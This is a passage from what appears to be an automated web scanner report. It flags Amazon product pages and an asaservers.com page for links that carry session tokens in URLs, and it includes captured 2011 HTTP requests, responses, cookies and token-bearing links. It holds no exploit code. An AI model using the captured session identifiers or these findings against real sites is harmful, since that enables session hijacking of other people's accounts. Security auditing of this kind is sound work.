<li><a href="/gp/redirect.html/ref=gw_m_b_pr?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Advertise Your Products</a>
...[SNIP]...

12.19. http://www.amazon.com/dp/B002Y27P3M  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B002Y27P3M

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /dp/B002Y27P3M HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:29 GMT
Server: Server
x-amz-id-1: 0717BXYES9PSJDQ1V2PY
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 1h6yE7wC1G8+JuE1Y1AtympRDo7XFCIGa8bMXRuR2y3e/Mqpf/5EOYAbk5K5ufGC
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 786246


<html>
<head>
<!-- oi -->
<scr
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_c1Vyob01BYSPJ?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2FB002Y27P3M%2Fref%3Dcm_sw_r_fa_dp_c1Vyob01BYSPJ%26bodytext%3DKindle%252C%2520Wi-Fi%252C%25206%2522%2520E%2520Ink%2520Pearl%2520Display%2520by%2520Amazon" target="_blank" class="tafSocialLink" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_c1Vyob01BYSPJ?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2FB002Y27P3M%2Fref%3Dcm_sw_r_fa_dp_c1Vyob01BYSPJ%26bodytext%3DKindle%252C%2520Wi-Fi%252C%25206%2522%2520E%2520Ink%2520Pearl%2520Display%2520by%2520Amazon', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -18px 0px; height: 16px; width: 16px;;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_c1Vyob01BYSPJ?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB002Y27P3M%252Fref%253Dcm_sw_r_tw_dp_c1Vyob01BYSPJ%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DKindle%252C%2520Wi-Fi%252C%25206%2522%2520E%2520Ink%2520Pearl%2520Display%2520by%2520Amazon%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2FB002Y27P3M%2Fref%3Dcm_sw_r_tw_dp_c1Vyob01BYSPJ%26count%3Dnone" target="_blank" class="tafSocialLink" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_c1Vyob01BYSPJ?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB002Y27P3M%252Fref%253Dcm_sw_r_tw_dp_c1Vyob01BYSPJ%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DKindle%252C%2520Wi-Fi%252C%25206%2522%2520E%2520Ink%2520Pearl%2520Display%2520by%2520Amazon%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2FB002Y27P3M%2Fref%3Dcm_sw_r_tw_dp_c1Vyob01BYSPJ%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -34px 0px; height: 16px; width: 16px;;">
...[SNIP]...
<span class="shasta_att_coverage_map_link"><a href="/gp/redirect.html/ref=amb_link_354073722_1?_encoding=UTF8&location=http%3A%2F%2Fclient0.cellmaps.com%2Fviewer.html%3Fcov%3D1&token=F65275FC32A090EFBE50BC510943370FAF8CBE85&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-22&pf_rd_r=0717BXYES9PSJDQ1V2PY&pf_rd_t=201&pf_rd_p=1295125422&pf_rd_i=B002Y27P3M">Check 3G coverage area</a>
...[SNIP]...
<br clear="all"/>
Discover, download, and listen to over 50,000 audiobooks from <a href="/gp/redirect.html/ref=amb_link_354961982_16?location=http://www.audible.com/&token=9C510153835443186B63A5734B33D7BA1741991C&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-32&pf_rd_r=0717BXYES9PSJDQ1V2PY&pf_rd_t=201&pf_rd_p=1315923602&pf_rd_i=B002Y27P3M" target="_blank">Audible.com</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_2?location=http://www.nytimes.com/2010/08/26/technology/personaltech/26pogue.html&token=FC3BB6E90A3E8721ADB0B39F84805E48900EDACD&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0717BXYES9PSJDQ1V2PY&pf_rd_t=201&pf_rd_p=1295125842&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_4?location=http://www.fastcompany.com/1684575/wanted-amazon-kindle-3rd-generation&token=3E149F19B6E9E7F0A5EBFF5447967C76704426D7&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0717BXYES9PSJDQ1V2PY&pf_rd_t=201&pf_rd_p=1295125842&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_6?location=http://reviews.cnet.com/e-book-readers/amazon-kindle-3g-wi/4505-3508_7-34140425.html&token=31E3D690023DB719242D9ACF186BCE6C53185AEC&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0717BXYES9PSJDQ1V2PY&pf_rd_t=201&pf_rd_p=1295125842&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_8?location=http://www.engadget.com/2010/08/27/amazon-kindle-review/&token=FF754E482756BF305A345655C9D0461CE99EA38C&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0717BXYES9PSJDQ1V2PY&pf_rd_t=201&pf_rd_p=1295125842&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_10?location=http://www.pcworld.com/article/202146/amazon_kindle_3_the_best_kindle_yet.html&token=D9CB6E2A29AB1E9D9FDC167523A8318384D83181&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0717BXYES9PSJDQ1V2PY&pf_rd_t=201&pf_rd_p=1295125842&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_12?location=http://www.pcmag.com/article2/0,2817,2368075,00.asp&token=6B5D74846F287633B361444F8611D03583758E3C&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0717BXYES9PSJDQ1V2PY&pf_rd_t=201&pf_rd_p=1295125842&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_14?location=http://www.zdnet.com/blog/btl/review-my-20-minutes-with-amazons-latest-kindle/37252&token=5530EC54CBF650B76674ECF0F50AADBEFC9C0B6B&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0717BXYES9PSJDQ1V2PY&pf_rd_t=201&pf_rd_p=1295125842&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_16?location=http://www.crunchgear.com/2010/07/28/amazon-reveals-new-kindle-139-for-wi-fi-version/&token=888A7FA0C2516C44AA33B5A80C267236CE93D96B&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0717BXYES9PSJDQ1V2PY&pf_rd_t=201&pf_rd_p=1295125842&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_17?location=http://ireaderreview.com/2010/07/28/kindle-3-review/&token=48DB81F4832216373A8CF9DDF08F2A06EE62AE6A&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0717BXYES9PSJDQ1V2PY&pf_rd_t=201&pf_rd_p=1295125842&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2YVZNKUMWGYJ4/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=E11626B1B942ACD9116BC166CAF1A828F9597B78&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2YVZNKUMWGYJ4.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2YVZNKUMWGYJ4/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=DDCB90634B0A257398DAAB0B03FAE2191D87E105&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2YVZNKUMWGYJ4.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2YVZNKUMWGYJ4/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C7ACACFEC13C0DF0F61EB7CB40DE5DA01F108B87&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2YVZNKUMWGYJ4.2115.Inappropriate.Reviews&voteSessionID=189-3627711-1112537"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RUAZZJ2E2JWT2/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=6D6A3B6C00CCAFC1CC0366BBFD7C44352D9D4D02&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RUAZZJ2E2JWT2.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RUAZZJ2E2JWT2/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=1C4BC77E645C4875BFD3B7556BC18BD6A94EC90D&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RUAZZJ2E2JWT2.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RUAZZJ2E2JWT2/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=8B80D9DB51A92D82CA386F8ED43A16F32F2D42B5&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RUAZZJ2E2JWT2.2115.Inappropriate.Reviews&voteSessionID=189-3627711-1112537"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RWVZO9B3R11LA/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=B0065617123A585F79FB1EC8EECACE7D3FD2A4C8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RWVZO9B3R11LA.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RWVZO9B3R11LA/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=09DFE53F7AF0245D03167C813046C5AD09C59730&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RWVZO9B3R11LA.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RWVZO9B3R11LA/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=FEF32D8640E18062DA3C7123CD548031839F6FE2&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RWVZO9B3R11LA.2115.Inappropriate.Reviews&voteSessionID=189-3627711-1112537"
>
Report abuse</a>
...[SNIP]...
<li class="nav_pop_li nav_divider_before"><a href="https://www.amazon.com:443/gp/redirect.html/ref=sa_menu_kcr3?location=https://read.amazon.com/&amp;token=34AD60CFC4DCD7A97D4E2F4A4A7C4149FBEEF236" class="nav_a">Kindle Cloud Reader</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Advertise Your Products</a>
...[SNIP]...

12.20. http://www.amazon.com/dp/B004DERF5M  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B004DERF5M

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /dp/B004DERF5M HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:27 GMT
Server: Server
x-amz-id-1: 02PR66HK6XCWZKHF0AKH
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 9jApjDaceP4S3M3wrYjdvdE0k7eTe1wBtTwOnB9gAOviuY78WxZJ6HfC7LEE40i0
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 370055


<html>
<head>
<!-- oi -->
<script type='text/javascript'><!--
var t0_date = ne
...[SNIP]...
<li class="nav_pop_li nav_divider_before"><a href="https://www.amazon.com:443/gp/redirect.html/ref=sa_menu_kcr3?location=https://read.amazon.com/&amp;token=34AD60CFC4DCD7A97D4E2F4A4A7C4149FBEEF236" class="nav_a">Kindle Cloud Reader</a>
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_a1Vyob0P6H6CZ?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2FB004DERF5M%2Fref%3Dcm_sw_r_fa_dp_a1Vyob0P6H6CZ%26bodytext%3DPlain%2520Jane%253A%2520Brunettes%2520Beware%2520by%2520Cristyn%2520West" target="_blank" class="tafSocialLink" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_a1Vyob0P6H6CZ?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2FB004DERF5M%2Fref%3Dcm_sw_r_fa_dp_a1Vyob0P6H6CZ%26bodytext%3DPlain%2520Jane%253A%2520Brunettes%2520Beware%2520by%2520Cristyn%2520West', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -18px 0px; height: 16px; width: 16px;;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_a1Vyob0P6H6CZ?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB004DERF5M%252Fref%253Dcm_sw_r_tw_dp_a1Vyob0P6H6CZ%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DPlain%2520Jane%253A%2520Brunettes%2520Beware%2520by%2520Cristyn%2520West%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2FB004DERF5M%2Fref%3Dcm_sw_r_tw_dp_a1Vyob0P6H6CZ%26count%3Dnone" target="_blank" class="tafSocialLink" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_a1Vyob0P6H6CZ?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB004DERF5M%252Fref%253Dcm_sw_r_tw_dp_a1Vyob0P6H6CZ%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DPlain%2520Jane%253A%2520Brunettes%2520Beware%2520by%2520Cristyn%2520West%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fdp%2FB004DERF5M%2Fref%3Dcm_sw_r_tw_dp_a1Vyob0P6H6CZ%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -34px 0px; height: 16px; width: 16px;;">
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1K9Z88CXVH0M7/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=326E755E14FDDFC40A72DBA2390A3FE2E23B82C6&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwNERFUkY1TS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R1K9Z88CXVH0M7.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1K9Z88CXVH0M7/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=10300C52910BCD69E136A9B51A8705645F2CCB94&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwNERFUkY1TS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R1K9Z88CXVH0M7.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1K9Z88CXVH0M7/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=14DE464B4DB3A2BB71260A61061983E6619F1A73&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwNERFUkY1TS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R1K9Z88CXVH0M7.2115.Inappropriate.Reviews&voteSessionID=189-3627711-1112537"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2CMD4V4KCZHNF/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2ECA07B24AAFBD386CE45CE8C0BCE3458E42D7C7&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwNERFUkY1TS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2CMD4V4KCZHNF.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2CMD4V4KCZHNF/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C26F5A26BFD4978E742691D76DFE80C65C71563F&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwNERFUkY1TS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2CMD4V4KCZHNF.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2CMD4V4KCZHNF/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=871A6BDDC11E93D911607A4DDD6931FF74866906&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwNERFUkY1TS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2CMD4V4KCZHNF.2115.Inappropriate.Reviews&voteSessionID=189-3627711-1112537"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R185S2PBJFANG8/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=A4ADBFDCF7C9FB3863FEE5E4897974A808C84C34&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwNERFUkY1TS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R185S2PBJFANG8.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R185S2PBJFANG8/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=9125E9B31E7DC5D13E51E28FF8CBA107FEA06305&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwNERFUkY1TS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R185S2PBJFANG8.2115.Helpful.Reviews&voteSessionID=189-3627711-1112537"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R185S2PBJFANG8/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=FEE7D47FDC0EEE3208E1812438117F2A0630F8C6&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwNERFUkY1TS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R185S2PBJFANG8.2115.Inappropriate.Reviews&voteSessionID=189-3627711-1112537"
>
Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Advertise Your Products</a>
...[SNIP]...

12.21. http://www.asaservers.com/showpages.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.asaservers.com
Path:   /showpages.asp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /showpages.asp HTTP/1.1
Host: www.asaservers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 04:23:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 63421
Content-Type: text/html
Cache-control: private


<HTML>
<HEAD>
<title>1U, 2U, 3U & 4U Rackmount Servers, Buy Cheap Linux DNS, AMD Istanbul & Supermicro Servers, HP Blade Server, Game & Web Servers Online - </title>
<meta http-equiv="Content-Typ
...[SNIP]...
